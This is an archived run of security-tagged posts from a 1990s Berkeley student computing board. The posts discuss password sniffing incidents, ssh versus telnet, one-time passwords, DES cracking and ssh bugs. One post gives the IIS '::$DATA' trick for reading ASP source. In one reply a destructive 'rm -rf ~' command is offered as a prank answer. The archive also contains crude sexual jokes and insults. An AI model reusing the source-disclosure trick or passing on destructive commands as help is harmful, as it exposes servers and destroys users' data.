7/27 One of the instructional computers was found cracked and was
possibly running a sniffer. Since the machine in question was
on the 43 net, soda accounts might have been compr[o]mised.
\_ are there political problems w/ turning off rsh telnet and
so on (in favor of ssh)
\_ Is that a pretty elitist point of view? Maybe we should just
leave rsh/telnet enabled, but force them to use a one-time-use
password scheme.
\_ lots of people don't access to ssh.
\_ lots of people don't [have] access to ssh.
\_ SSH does not work well with some corporate firewalls
\_ A more 3l33t plan would be to unplug soda's net connection, and
have all interaction with the machine be via hardwired TVI 920
terminals. All the terminals would be in the same room as soda
(to make sure that hackurs from the outside don't splice their
way into the wiring), and that room would be TEMPEST shielded.
\_ and what would we use soda for it it had no net connection?
\_ Don't use telnet. Don't use telnet. Don't use telnet.
(I have said it thrice; what I tell you three times is true.)
\_...or ftp, or pop3...
\_ Kerberized telnet? telnet -x otherhost
\_ not to soda
\_ sometimes we have to connect to soda from devices that don't
support anything BUT telnet. Like routers and access servers.
We need one-time-passwords on telnetd. -ERic
\_ but was the snark a boojum?
\_ The snark WAS a boojum, you see.
\_ If your firewall is lame-ass (i.e. run by BBN because
some marketroid thought it would be a good idea) and
you are forced to use telnet, do what you can to set up
one-time passwords via s/key. There is a free WinBlows
one-time password computer available out there (I got
my copy from somewhere on <DEAD>ftp.msri.org<DEAD>) and if you want
to port it to another UNIX then we have source here on
soda. Doesn't solve all problems, but at least prevents
scriptkiddies from grabbing your real password.
rtfm on skey(1) for more info. -- tmonroe
\_ Might want to check out OPIE instead of S/Key. --dim
\_ urlP
\_ ftp://ftp.nrl.navy.mil/pub/security/opie or
ftp://ftp.inner.net/pub/opie --dim
\_ One-time passwords are somewhat limited compared to
SSH, though, since they don't typically encrypt the
contents of your session (thus preventing you from
safely typing other passwords from within telnet).
Better than nothing, though.
\_ The point was not everyone can use ssh.
\_ ssh is also much better than telnet for dealing
with flaky connections that drop a lot of packets
for extended periods of time, if you don't want
to lose link. For some reason. Can someone
explain this? I'm curious. -John
\_ TCP_KEEPALIVES-- telnet uses them, ssh doesn't.
odd that the SO_KEEPALIVE would cause to lose
connections in a lossy network, but thats how
it works. -ERic
\_ Since the 43-net runs through public access labs that anyone can
bring their laptop into and start sniffing, always assume packets
to soda are being sniffed.
\_ Why isn't access at the public access labs run on switches?
Is there a reason to expose the communications "backbone"?
\_ What's the notation for "current PID" in most shells and
Perl? There's your answer.
\_ Geek. Just say $$. Sheesh. Had to be "clever"?
\_ Switches cost money - the dept's just barely finishing
converting Cory Hall - Soda Hall is scheduled to be
converted as soon as they figure out who's paying for it.
\_ the cost difference between switched and shared is
negligible these days. -tom
\_ But they already have shared and already paid.
Also, maybe they want to wait for Fast Ethernet?
\_ Because the university by its nature is always behind. |
| 1998/7/25-26 [Computer/SW/Security, Computer/SW/Unix] UID:14393 Activity:nil |
7/24 What is the best way to do encrypted FTP? I'd like to do the data
stream, but I'd settle for the command channel. Anonymous FTP would
be nice, too. SSL is the only method I've investigated. Ideas? --dim
\_ SSH port forwarding for this is pretty standard; you might need to
use passive FTP. Datafellows is also coming out with an FTP client
with built-in SSH soon, they say. If you don't need interactive
capability, SCP is far better. -- schoen
\_ Already using SCP, but have need for FTP. Port forwarding as
described in the SSH FAQ is not an option. I need a more
transparent solution. Thanks. --dim
/- Whoa, news from the future! |
| 1998/7/14 [Computer/SW/Security] UID:14328 Activity:high |
7/13 http://www.distributed.net/des crack the Data Encryption Standard using idle time on your computer, prove it's inadequate. \_ get a life. \_ Oh SURE . . . you say that now, but wait until 3:30 AM on that fine Sunday morning, when the black helicopters hover over your house, and the black ropes come out, and zombie Nazi mind-slaves (vat-grown by the UN) wearing black body armor rappel down them to burst through your front door and kill you and the wife and little Timmy, ALL BECAUSE THAT E-MAIL TO GRANDMA FLO AND GRANDPA MEL ABOUT LITTLE TIMMY'S SOCCER GAME LAST WEDNESDAY used WEAK DES ENCRYPTION . . . don't expect me to cry for you _then_. Bastard. \_ We don't work on Sundays. -Black Mask Man \_ Why do you not like announcements of techie stuff? This IS the "Computer Science" Undergraduate Association, is it not? \_ "using idle time on your computer [soda]".... \_ soda is not your computer \_ soda is our computer. keep this stupid crap off. crap off. It's already well known that DES is inadequate. It's been proved. This is nothing more than a GeekEgo thing. \_ Don't do that, then. \_ Think of it this way. You get $$$ if you personally break it. Of course, people who do CS only for that reason deserve to be shot. \_ That's not CS, it's CE. \_ It's not even CE. It's running a black-box program on your computer. \_ There are other reasons to do it money: curiosity, politics. \_ Is there a Cal team this time? -- yuen \_ Not unless I hear a lot of interest or unless the RC5 teams carry over. Or ask Trey (rhyde@uclink4) if he wants to take it over again. This contest is supposed to end in 9 days; it's not worth doing a lot of organizational work for something that's gone a week after you start. -- schoen, inheritor of UCB RC5 team contact |
| 1998/7/2-3 [Computer/SW/Security, Computer/SW/Languages/Web] UID:14289 Activity:nil |
7/2 Microsoft security flaw. "::$DATA" behind any asp code will
allow you to read source code.
\_ So? What about Microsoft isn't a security flaw? |
| 1998/6/18-23 [Computer/SW/Security] UID:14223 Activity:nil |
6/18 http://www.fbi.gov/foipa/ufo.htm -- the truth is out there... \_ http://home.att.net/~ixlez/inexufo1a.htm |
| 1998/6/12-16 [Computer/SW/Security] UID:14208 Activity:kinda low |
6/11 ssh 1.2.25 installed, to fix the crc checking security hole.
The update broke hushlogin support; I hacked sshd to fix the
problem for now (~mconst/pub/ssh/sshd-hushlogin-patch), and
I'm sending a bug report out soon. Let me know if anything
else goes wrong. --mconst
\_ so *why* is the patch ifdef'd for only __FreeBSD__ when it looks
like there's nothing OS dependent in it?? -ERic
\_ My patch doesn't mention FreeBSD, it was already there -- the
ssh-1.2.25 login_cap code is all in #ifdef __FreeBSD__ blocks.
What broke is that under FreeBSD, sshd would ignore .hushlogin
The problem was that under FreeBSD, sshd would ignore .hushlogin
files and just look at login.conf. |
| 1998/6/4-8 [Computer/SW/Database, Computer/SW/Security, Computer/SW/Languages/Web] UID:14175 Activity:moderate |
6/4 Anyone have experience with http://best.com as web host provider? Good? Bad? Comparable alternatives? \_ Good. No comparable alternatives. -tom \_<DEAD>www.best.com/boxes/~indian<DEAD> \_ Best experience i've ever had with a web provider. They provide competent and beyond-the-call-of-duty technical support, FAQs, etc. -appel http://www.chaosium.com http://www.glorantha.com \_ I'm using it for two of my web sites (http://www.theil.com and http://www.docmisha.com and would definitely recommend it to other folks. Haven't had such a good experience with their tech support though. -genie \_ I plan on having several CGI scripts. They list a 1000cgi seconds/day. I highly doubt I'll reach that limit, but just so I have a reference, what type of program with how many uses per day would come close to hitting that quota? \_ run your CGI with "time foo.cgi" to see the amount of CPU time it takes. It's basically a non-issue unless you're grabbing nude pictures out of a database. -tom \_ Though wall-clock time on your system and wall-clock time on their system may be rather different. Is it an issue if you're grabbing pictures of clothed people from a DB? :-) \_ You're not charged for wall-clock time, you're charged for CPU time. They run boxes very similar to soda, so CPU time here should be comparable. It is unlikely that you'll get enough hits to matter if you're grabbing pictures of clothed people from a db. -tom |
| 1998/6/4-11 [Computer/SW/Security] UID:14171 Activity:nil 66%like:14387 |
6/3 ssh-1.2.23 installed, bugs to mconst. |
| 1998/5/21 [Computer/SW/Security] UID:14119 Activity:very high |
5/10 How does the root know what the sniffer logged??!?!?
Hi. You are receiving this automated note because of a breakin to one
of our machines. The intruder installed a sniffer and began logging
passwords.
Your password appeared in those logs.
Therefore, you should change your password immediately. (If you use
\_ and use SSH
the same password on several machines, don't forget to change it on all
of them!)
\_ Because the sniffer logged to disk and root can read the disk.
DUH!
\_ Because the sniffer E-mailed the passwords to somebody else, and
root happened to run across the list one day when they were
reading everybody's E-mail looking for interesting stuff, silly.
\_ Because you logged in during the period of time the sniffer was
active. It's a good guess that your password was sniffed during
that time.
\_ "Appeared in" --> "we have a copy of, and we read". Not telepathy.
\_ so why the love affair with ssh? besides telnet,
aren't the pop3 and ftp ports also vulnerable?
\_ that's like asking "why the love affair with helmets?
aren't other body parts still vulnerable?" - protecting
the most important/used parts is better than going
completely unprotected
\_ Yes, of course. That's why SSH supports port redirection, so
that you can securely use unencrypted services. See the man
page for ssh, options "-L" and "-R". SSH is more than just a
telnet replacement...
\_ Don't use pop3 and use scp where you'd use ftp (although ssh
can encrypt ftp's authentication). --dim
\_ Huh?
\_ What's so hard about "don't use pop" or "use scp instead
of ftp"?
\_ It's super cool sysadmin magic.
\_ cuz root *is* the sniffer!
\_ no, root is the Kwisatz Haderach. |
| 1998/5/12-13 [Computer/SW/Unix, Computer/SW/Security, Academia/Berkeley/CSUA] UID:14090 Activity:low |
5/12 As long as all these new jobs are getting announced in /csua/pub/jobs,
a small request for people to please CLEAN OUT all the old jobs that
are no longer relevant. A number of postings there are owned by root
because they were moved around. Those responsible for them, please
let me know if they are still relevant or can be deleted. -lila
\_ Princess Lila made a demand! All must comply.
\_ "small request".
\_ Ohhh. Ahh. |
| 1998/5/6 [Computer/SW/Security, Computer/SW/Unix] UID:14055 Activity:low |
5/5 From the MOTD on http://socrates.berkeley.edu: >On June 1, 1998 Communication and Network Services (CNS) will be >enhancing the Web access to the Campus Directories. At that time, >we will discontinue platform-specific Directory Services, such as >Unix fspb and Macintosh HyperPB, and gopher and telnet access to >Infocal. This will not affect telnet/host presenter access to >Socrates, > >If you have any questions, please send e-mail >to cpadmin@profile.berkeley.edu. \_Who cares? \_ _I_ care, dammit. Platform-specific directory users, I feel your pain . . . |
| 1998/4/17-18 [Computer/SW/Security, Computer/SW/Unix] UID:13980 Activity:high |
4/17 If I want to use ssh to connect to a remote machine and run xwin
apps, what is the command line to start, say, xterm. And what do I
need to set up beforehand? -emarkp
\_ unix: /bin/rm -rf ~
windoze: fdisk
mac: drag all your icons to the trash can. empty trash can.
\_ Um, I assume this is a comment about the security? I though
ssh was a secure way to transmit x-events. Furthermore, this
does not answer the question. -emarkp
\_ someone buy this man a clue
\_ with a properly configured ssh, its all hidden 'silently' from
you. ssh to the remote host and run your x commands normally
SSH 'silently' sets your DISPLAY environment correctly for you,
and your shell commands will inherit it. -ERic
\_ Where can I go to find docs to do the setup correctly? Or
is it simple enough to post here? -emarkp
\_ Have you actually tried to run xterm already? If it
didn't work, maybe you want to give the error mesg
encountered.
\_ The freeware 1.22 unix package had plenty of docs. RTFM.
It isn't that hard.
\_ well the 'default setup' works 'correctly'. If you have an
idiot sysadmin who changed the defaults and put in things like
disabling xforwarding in sshd config, then it won't work. -ERic |
| 1998/4/14 [Computer/SW/Security, Computer/SW/OS/Windows] UID:13950 Activity:high |
4/14 What's with the login uname? MS-DOS V3.3 ? Is this joke going to
last forever?
\_ It's no joke. We've secretly replaced soda with an MS-DOS machine
(with Microsoft DOS/Connect for networking) and we were hoping no
one would notice -- but damn it, you've spoiled everything. --root
\_ MS-D0S???/? 1 CAN RUN K1NG"Z QU3ST 0N 1T!!!!1!!!
BUT H0W DU 1 S3ND TH3 P1CTURZ 2 MY SKR33N?????? H3LP!!!1!
\_ alias ver 'uname -a'
\_ some perpetual April's Fools Joke
\_ The best one so far, IMHO -muchandr
\_ The joke's still there. jon@csua attaching his name as if
he has done anything. |
| 1998/4/2 [Computer/SW/Security] UID:13893 Activity:nil |
4/1 What is the difference between a segmentation fault and a bus error?
\_ segmentation is an address fault. you have attempted to access
an invalid address or one you do not have permission to access.
bus error is usually an aligment violation. attempting to access
an int on a non-word boundary, for example. --aaron
\_ But why is it called bus error? not alignment error?
\_ It goes back to the days when Muni's schedule system was
computerised. Due to boundary/alignment errors, they were
sending all the busses on the same route at the same time.
Thus, the bus error was created. |
| 1998/3/22-23 [Computer/SW/Security] UID:13849 Activity:high |
3/21 Ron Rivest is at it again: he's invented a technique to achieve
message confidentiality with hash functions and no encryption,
simple, intuitive, and completely non-export-controlled.
http://theory.lcs.mit.edu/~rivest/chaffing.txt
\_ note that he's just rephrased steganography to have a more dynamic
method of mixing the message bits into another data stream, and he
relies on message authentication to reject the superfluous data.
old mechanical crypto systems in the 60s did stuff like that
but filtered by using the same psuedo-random sequence as the
sender. Rivest's method will require a good random generator at
the sender (to permute packet order for the chaff). it will
\_ why do you think that? my reading of his text didn't imply
any packet order changes, just one or more chaff mesgs per
valid packet. please mail me --oj
\_ The packets go out in the same order, but you have to send
chaff too, and the chaff has to be in an unpredictable
order with respect to the wheat. If you always do
wheat1-chaff1-chaff1 wheat2-chaff2-chaff2 wheat3-chaff3-chaff3
it's not hard to figure out where the wheat is.
also probably make everybody's exportable authentication code
get reclassified as munitions, now that someone's pointed out
how it "really is encryption" (the way regulators think). --karlcz
p.s. he also requires that the secret authentication key get
transported by some other secure means (public-key encryption
for those of us without exploding-attache-case couriers ;-).
\_ I'm not too terribly impressed. As karlcz pointed out there's
still this secret-key business thats required to create valid MACs
and I'm not really psyched about the typical CSUA idiot adding
300 chaff packets per wheat packet to keep their email and porn
URLs secret from "Them". The net is slogged enough as it is.
What really needs to happen is to drop the ridiculous export
controls. If I'm a terrorist or in the mafia, I _am_ going to
\_ That was exactly Rivest's point, though. Obviously a block
cipher is much more effective than chaffing, but it's currently
in a very different political position. But Rivest's own
conclusion is: "Mandating government access to all communications
is not a viable alternative. The cryptography debate should
proceed by mutual education and voluntary actions only." That
goes for international controls as well as domestic.
use the best possible encryption for all communications, and
be damned the US law. Hello, duh, a terrorist or high powered
mafioso is already going away for life. Going to add 3 months
of consecutive time for an encryption export violation?!?
\_ you miss the point. If encryption were export legal, then it'd
be easy to market via consumer channels. Once that happens,
you can pretty much kiss good-bye law enforcement's ability to
wire-tap even the petty criminals.
\_ So the point wasn't to make a decent and reasonable secure
communications method, but was simply to snub law enforcement
with a hacked end run?
\_ Yeah, kinda looks that way. |
| 1998/2/17-18 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13682 Activity:high |
02/16 In Apache, when I use .htaccess, how do I "log-off" from a browser?
Thanks.
\_ You're not "logged on" in the first place; http connections are
stateless. If the browser decides to store the username and
password, that's the browser's business.
\_ Okay then, how do I make the browser not use the username
and password during HTTP transaction then?
\_ Restart the browser or get one that lets you
clear stored passwords
\_ Restart-- you mean quit and start again? Sheesh
\_ Yep - sucks don't it?
\_ Yep. Sucks don't it?
\_ It's totally browser-dependent. Once Netscape
/------------------/
Once Netscape releases the source, expect the days to look like the
80's when people have to deal with DOS 2.0/3.0/MSDOS/Windows 2.0/OS2
Geoworks OS incompatibility, not mentioning incompatibilities between
MSWord/WordPerfect/WordStar/AmiPro/Lotus/blah blah blah. Proliferation
of many different warez means happiness and perhaps some creativity but
it also means a lot of headache for the end users. Are the average
American Joe sophisticated enough that they can handle so many
different platforms with different HTML standards, plug-ins, c00l
features, this and that, or they just want a simple burger that
satisfies their stomach? What do the dumb average American Joes want?
releases the source you could make a "forget
passwords" button or something.
\_ Seriously doubt Joe User is going to d/l a hacked up copy of NS
from http://www.butchery.org They're going to go to netscape, as always,
and d/l the version made available by the NS people. The NS
version is going to be a "best-of-the-net" browser. Or so says
\_ Dronage deleted. For your reference, it said:
"\_ Next drone deletion means deletion of entire motd. Watch it u nazi."
NS.
\_ so? what does this have to do with the above?
"You have been warned"
NS.
\_ So? What does this have to do with anything?
\_ It has to do with a large piece of text that was deleted. |
| 1998/2/13-14 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13664 Activity:moderate |
2/12 Last month, the Clinton Administration announced that it will spend
$28 million to retrain workers, create an Internet jobs bazaar and try
to convince kids that the computer sciences are cool. The p.-r.
blitz will include public service videos starring Jimmy Smits,
tough-guy star of the television cop show NYPD Blue.
\_ Isn't CS61A full enough already?
\_ Not enough potstickers to go around anymore?
\_ Oh good.. flood the industry with idiots and marginalize all of us.
\_ The CS61A undergraduate teaching assistant industry?
\_ WONDERFUL. More Microsoft-like people writing more code, and now
applications will crash way more than ever. I remember the good 'ol
days of text applications with DOS and apps just don't crash the
way they do now. Microsoft/Netscape are two fine examples. |
| 1998/2/4-5 [Computer/SW/Security] UID:13623 Activity:high |
2/4 I have an obsession to crack root to read people's emails.
Is that normal?
\_ yes
\_ ask marco
\_ How would you do it on shadowed systems?
\_ The Shadow knows....
\_ <DEAD>www.rootshell.com<DEAD>
\_ Don't bother. As a sysadmin who has had real work reasons to
read mail files over the years, I can assure you that no one's
mail is worth reading, much less the effort required to acquire
the access to do so.
\_ but you get some good jokes sometimes... |
| 1998/2/2-3 [Computer/SW/Security] UID:13608 Activity:moderate |
2/2 If you've experienced frequent lost of connection to soda it's
because you turned on your wall (wallall y). Try turn them off
and tail the wall log instead (tail -f) and see if that improves
the reliability for you.
\_ Do you have any basis for this statement at all?
\_ Trust me on this one.
\_ So you're saying that wallall affects my packets not being able to
get through some router btwn my ISP and UCB? Wow.
\_ Yeah, didn't you read the CERT advisory of April 1, 1997,
"wallall Denial of Service Attack"?
\_ Wall is more than just a program; it is a way of life.
\_ Beware The Wall. We don't need no education. |
| 1998/2/2-3 [Computer/SW/Security, Computer/SW/Languages/Misc, Computer/SW/Unix] UID:13607 Activity:high |
2/1 What is the easiest way to allow people (actually myself) to upload
stuff through my web page? --- clueless
\_ DON'T DO IT.
\_ This may open you up to a lot of security risks; think carefully
when you implement something. How do you want to do it? Do you
want to enter text into a form and then have it available as a
file in an account somewhere?
\_ Don't listen to these idiots. The easiest way is probably
HTTP PUT; see the Apache documentation.
\_ Oh really? So where's a page you wrote that allows
uploads? Post the URL so we can all have fun hacking it.
\_ Why don't you just tell us how to hack HTTP PUT.
\_ "There are few scripts available which implement PUT
handling securely." _Apache Week_, April 4 1997
In concept it _can_ be secure, but it's not an
unrealistic concern; frequently the PUT scripts
have holes, even more than other CGI stuff.
\_ PUT is fairly simple; it is not difficult to write
a secure PUT script. You don't need "many"
scripts available which implement PUT securely,
you only need one.
\_ right, but first you've got to find it. :-)
\_ If you use suexec, it's not hard to
write one. Just make all paths relative
to the document root and disallow ".."
and other funky characters.
\_ YES! suexec is much more secure! We really should run
httpd on soda instead of scotch so that one will not be
able to kill the "nobody" process arbitrarily.
\_ I'm still waiting to see your secure
page. Post the URL when you're ready.
\_ Oh, give it up.
\_ thanks for all your responses. I wanted to do this as a way to
replace ftp to transfer my manifestos:-). The web server is going
to be running only when I need to transfer file and is shut down
the moment the transfer is done. So I guess it does not need to
be too secure. Anyway, the question is now whether I will get
enough clue to find out how to write a minimal script. -- clueless
\_ You must be too sexy to use scp.
\_ No, Jobs is too sexy to have scp developed for mac. |
| 1998/1/21-22 [Computer/SW/Security] UID:13541 Activity:very high |
1/21 ssh versions through 1.2.21 have security hole in ssh-agent - upgrade
to 1.2.22 or stop using ssh agent until you do.
\_ Uh oh... you mean people will be able to snoop my incredibly
sensitive private email and see what porn I'm downloading? Help!
Help! The sky is falling!
\_ Any URL?
\_ for the porn?
\_ See:
http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265 -dim
\_ Once again, is there an URL confirming this?
\_ http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265
\_ Just read the freaking ssh 1.2.22 release notes or
comp.security.ssh |
| 1997/11/19 [Computer/SW/Security] UID:32164 Activity:nil |
11/18 Has anyone had trouble getting xlock to work with shadow
passwords? How do I get around it not knowing where to look
for the passwords? Having it setuid does not work. -John
\_ Hmm, I managed to get version 4.01 to work with shadow
passwds. Maksure that on top of making the binary setuid
that the binary is owned by root. -- marc
\_ /usr/openwin/bin/xlock works fine with shadow passwords. |
| 1997/5/2-15 [Computer/SW/Security, Computer/SW/Unix] UID:32134 Activity:nil |
4/25 Every new account on soda comes with a file called "FAQ". (If
you lost your copy, a fresh one is always available in
/usr/local/csua/FAQ .) Please read it and remember it when you
have questions/problems. Asking root questions that it answers
is grounds for getting really snide or obnoxious responses from
root, if your mail is answered at all. |
| 1997/4/25 [Computer/SW/Security, Computer/SW/Unix] UID:32127 Activity:nil |
4/17 If you ever have problems logging into soda, please check the
http://ucb.org.csua newsgroup for announcements of system problems
before mailing root. If there is a system problem, mailing
root just fills root's mail spool once it's fixed and too late
to do anything about it. This and other useful information
was in the FAQ file in your account when it was created.
Please read it and remember it - if you lost your copy, a
fresh one is always available in /usr/local/csua/FAQ.
Asking root questions that it answers is grounds for getting
really snide or obnoxious responses from root. |
| 1997/1/29 [Computer/SW/Security, Computer/SW/OS/Windows] UID:32049 Activity:nil |
1/29 I bought a new HD, 4 gig, and I'd like to move everything from my
old 1 gig to the 4 gig (4 gig = primary, 1 gig = secondary). Where
can I find a good DOS backup utility that does this? Thanks.
\_ DOS Tar's good
\_ No, it doesn't do long name (8+ char), STUPID
\_ what's wrong with copy /s d:\ c:\c_drive ? |
| 1996/10/29 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:31974 Activity:nil |
10/28 The San Francisco Book Festival's this weekend, if anyone's
interested... it's generally lots of fun -- interesting authors, poets,
book crafts, etc. More information's at http://www.sfbook.org
There's generally a nominal admission charge, unfortunately. --tabloyd
\_ youll pay hundreds for dorky computer equipment which will be worth
half its value in 6 months, but you complain about a "nominal"
admissions charge to a book festival... :)
\_You should hear me complain about computer equipment (which we
hardly ever buy anyway!). But I just thought people should be
aware that there is an admission fee -- you also have to pay to
buy any books, unlike at the ABA, where it's all free. --tabloyd
\_ fair enough! :) |
| 1996/10/29 [Computer/SW/Security, Computer/SW/WWW/Server, Computer/SW/Unix] UID:31973 Activity:nil |
10/28 Why aren't the web server logs mounted on soda? People do like
to see who is accessing their web pages.
\_ Try mailing root and asking them. Most likely it's just something
no one's bothered to do yet as part of the changeover.
\_ I'll let you serve my logs baby
\_ I wanna see who's accessing your web pages, too... |
| 1996/10/28-11/4 [Computer/SW/Security] UID:31953 Activity:nil |
10/24 IMPORTANT! A sniffer was caught using one of the Cory Hall
machines to get passwords to accounts on soda. He sniffed net
connections from the 240 subnet to soda and elsewhere. Please
change your password if there's any chance your account
was compromised! |
| 1996/6/5 [Computer/SW/Security, Computer/SW] UID:31849 Activity:nil |
6/3 Anyone know how i can change my local address with Sproul over
the Web? I know they have a page for address change form...
anyone know what it is?
\_ I think that you can only do it from their Bear Facts
macs that are scattered across campus. - sagarwal
\_ http://registrar.berkeley.edu:4202/BearFacts.html
\_ You'd think they coulda spared a couple of IP addresses
or something to give it it's own host/virtual host ...
\_Actually DCNS is rather short of IP addresses and would
rather not have to go buy another block from BBN/Planet
until they absolutely have to, as the cost of them is going
way up now that it's for-profit BBN and not the
non-profit BARRnet running the connections
Besides, why bother for a server that just says
"Web access coming soon"?
\_ They promised to make it accessible via WWW from
any (campus ?) host but don't bet on it...
\_ I would - the campus is pushing to get everything
on the web - less headaches for them that way |
| 1996/6/5 [Computer/SW/Security] UID:31846 Activity:nil |
6/4 PLEASE OH PLEASE mount scotch! Last time I edited my web page,
I didn't have a beard, and Menudo were still in style.
\_ it doesn't matter much since no one can access it anyway.
be patient and someday scotch will be fixed.
\_ I just want to be able to ftp my files onto UCSEE's web server
so then people CAN access it. Please mount it just so that
we can remove our files.
\_ We are not going to mount it until scotch is stable.
As has been mentioned before, if you really really really
need your files, mail root and someone will get them for
you and plop them down on soda. -lila
\_ How about hacking up a ftpd that allows non-anonymous
access to scotch to update files? I could put together
such a beast... -ERic |
| 1995/3/1 [Computer/SW/Security, Computer/SW/Unix] UID:31773 Activity:nil |
3/1 Anyone knows where on campus can I find Xterminals to login directly
to Soda without a facilities/departmental login?
\_ yes.
\_ what a jerk giving these smart ass remarks.
\_ fuck you. if you want nice friendly advice, get off soda.
\_ i won't give you the pleasure you nerd. you can't get
any. :P -word2yomomma!
\_ 343 soda has some xterminals you can use for this, and probably
the machines in the lounge across the hall also.
help@soda is generally more cheerful about giving answers.
--PeterM
\_ Where is the lounge located exactly and are the machines there
color terms? What are the hours for the lounge and 343?
\_ that _jerk_ can learn something from PeterM. - dookie |
| 1995/3/1-6 [Computer/SW/Security] UID:31768 Activity:nil |
2/18 CHANGE YOUR PASSWORD! Someone has been snooping the net for
passwords, and apparently got rather a lot of them. |
| 1995/3/1-4 [Computer/SW/Security, Computer/SW/Unix] UID:31767 Activity:nil |
2/21 If you would like your account moved to /usr10, mail root. /usr10 has
lots of space, but has been known to crash. |
| 1995/2/9-11 [Computer/SW/Security] UID:31753 Activity:high |
2/9 on-line service surfer wanted for about
10 hours of work. send mail to hh@xcf if you're interested.
you must have familiarty with and access to prodigy, aol,
and compuserve.
_,.-----.,_
,-~ ~-.
,^___ ___^.
/~" ~" . "~ "~\
Y ,--._ I _.--. Y
| Y ~-. | .-~ Y |
| | }:{ | |
j ! / | \ ! l
.-~ (__,.--" .^. "--.,__) ~-.
( / / | \ \ )
\.____, ~ \/"\/ ~ .____,/
^.____ ____.^
| |T ~\ ! ! /~ T| |
| |l _ _ _ _ _ !| |
| l \/V V V V V V\/ j |
l \ \|_|_|_|_|_|/ / !
\ \[T T T T T T]/ /
\ `^-^-^-^-^-^' /
\ /
\. ,/
"^-.___.-^"
You're dead. |
| 1995/2/9 [Computer/SW/Security, Computer/SW/Unix] UID:31748 Activity:nil |
2/9 Theodore == multiple login from different annex boxes man. Can we turn
off the little fuckers account now?
\_that is fucker's ... where is your grammar boy?
\_ that should be "grammar, boy", as it is
unlikely that you are talking about a
child schooled in English who goes around
explaining mistakes.
\_ he was just being obtuse. he really meant:
"... where is your aaron"
theodore ttyrn annex-64-1.Berke Thu Feb 9 03:03 - 03:25 (00:22)
theodore ttyri annex-64-1.Berke Thu Feb 9 02:58 - 09:40 (06:42)
theodore ttypC annex136-4.Berke Thu Feb 9 01:04 still logged in
theodore ttyrY annex136-4.Berke Thu Feb 9 00:40 - 02:57 (02:16) |
| 1995/1/21 [Computer/SW/Security, Computer/SW/Unix, Health/Women] UID:31725 Activity:nil |
1/20 Do not ask to be blown by root. Rumours of us rendering such
favors to account holders are highly exaggerated.
\_ Blow me.
\_ mail whoeveryouare < prostitute
\_ Rumor not exaggerated, but we need more women on CSUA staff.
/ \_ This isn't the way to get them...
| \_ It's a better way to scare them off.
\_ this pungent tang of feminism confirms a musing I had
about how a feminist with insight is not a feminist
at all, but I won't get into it here.
\_ What makes you think this display of tast
and maturity only disgusts women?
\_ I'm sure that's the intent, o wise visionary.
\_ Men give *way* better head than women.
\_ You just haven't met the right women. Or maybe you've just met
exceptional men.
\_ You obviously don't understand what I am talking about.
\_ Rumor has it that ali gives good head.
\_ not as good as partha (sorry, ali)
\_ With a name like Banerjee, you know it has to be good |
| 1994/11/11-1995/1/5 [Computer/SW/Security, Computer/SW/Unix] UID:31649 Activity:kinda low |
1/5 WWW is now setup on soda. If you want to setup your own
home page, cd in /www/<first letter of your login>/<your
login name>/public_html and put your files there.
If you do not have a directory in /www/, run
/usr/local/adm/bin/makeme. |
| 1994/4/28 [Computer/SW/Security, Computer/SW/Unix] UID:31578 Activity:nil |
4/27 Someone has a 2.5-megabyte core file in /tmp which has been sitting
around since 4/26. Now *I* can't read news because the filesystem's
full. Why can't people be even slightly considerate?
\_ This is soda, that's why. Nobody gives a shit about what's in
/tmp and so they don't delete it 'cause it's gonna get nuked
eventually. How often does the /tmp sweeper go through anyway?
\_ Every week or so -- not nearly often enough. Maybe we
should have /tmp quotas too. Say 1 meg soft, 10 megs
hard or something like that.
\-that is a stupid idea. look files have names attached
to them ... just mail the person with a lot of old shit and
tell them to delete it. cc: root if you want and if someone
is incessantly a bozo, then root can send something stronger.
\_ Something stronger you want? Hmm...how
about a little chsh or passwd gift? Or
maybe just an rm -r on the hoser's acct.
\_ You twinks, /tmp is cleared of stuff not accessed in 3
days every night. Get a clue. |
| 1994/4/11 [Computer/SW/Security, Computer/SW/Unix] UID:31558 Activity:nil |
4/10 Still looking for a machine that doesn't crash. Mail me - root |
| 1994/3/20-4/28 [Computer/SW/Security] UID:31531 Activity:moderate |
1/22 Politburo meetings are Fridays at noon in 238 Evans Hall.
***UNOFFICIAL MESSAGES BELOW***
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
F O R O F F I C I A L U S E O N L Y
W A R N I N G
YOU HAVE REACHED A U.S. GOVERNMENT COMPUTER OR DATA
BASE, USED SOLELY BY THE U.S. GOVERNMENT, ITS OFFICERS,
AND AGENTS. IT IS A VIOLATION OF UNITED STATES CODE, TITLE I8,
TO ACCESS AND USE U.S. GOVERNMENT COMPUTER RESOURCES WITHOUT
SPECIFIC AUTHORIZATION. EACH ACCESS IS SUBJECT TO RECORDING
AND AUDITING. WITHOUT SPECIFIC AUTHORIZATION FROM THE U.S.
GOVERNMENT, YOU ARE AN INTRUDER. INTRUDERS ARE SUBJECT
TO CRIMINAL PROSECUTION, FINE, AND/OR IMPRISONMENT.
***********************************************************************
***COMMUNICATIONS SECURITY MONITORING NOTIFICATION***
THE USE OF YOUR E-MAIL TERMINAL CONSTITUES CONSENT TO
COMMUNICATIONS SECURITY MONITORING
***********************************************************************
FOR ASSISTANCE CONTACT COMMUNITY SERVICES CENTER
TELEPHONE: (DSN) (510) 642-7453
E-MAIL: Surveilance@soda.berkeley.edu |
| 1994/3/6 [Science, Computer/SW/Security] UID:31503 Activity:nil |
3/6 New cryptology advance renders DES _insecure_. Read sci.crypt for
more info. Basically a machine like soda can break a 10 char crypt
in about 8 hours. This has SERIOUS security ramifications.
\_This technology is not that new. The U.S. government has not
allowed DES for use with classified documents for years. This would
imply that the government has cracked DES long ago. If the
civilian population has been able to crack it too, I would not
be surprised.
\_Yeah, and I've got a bridge I'd like to sell you, ya twink.
\_Nice try.
\_ Actually, I'm not the owner of the account of the person who
wrote this. I broke into his account using the new super-duper
technology fu thingy.
\_ DES never was secure. They've had DES-cracking LSI chips for at
least a year that simply do an exhaustive search of the key-space
really fast. |
| 1994/2/22 [Computer/SW/Security] UID:31494 Activity:nil |
2/21 Read ~boss/Clipper for info on the clipper chip, and for a chance
to add your name to a petition against it.
\_ The issue of whether the government has a legal right to
monitor communications (with the proper search warrant)
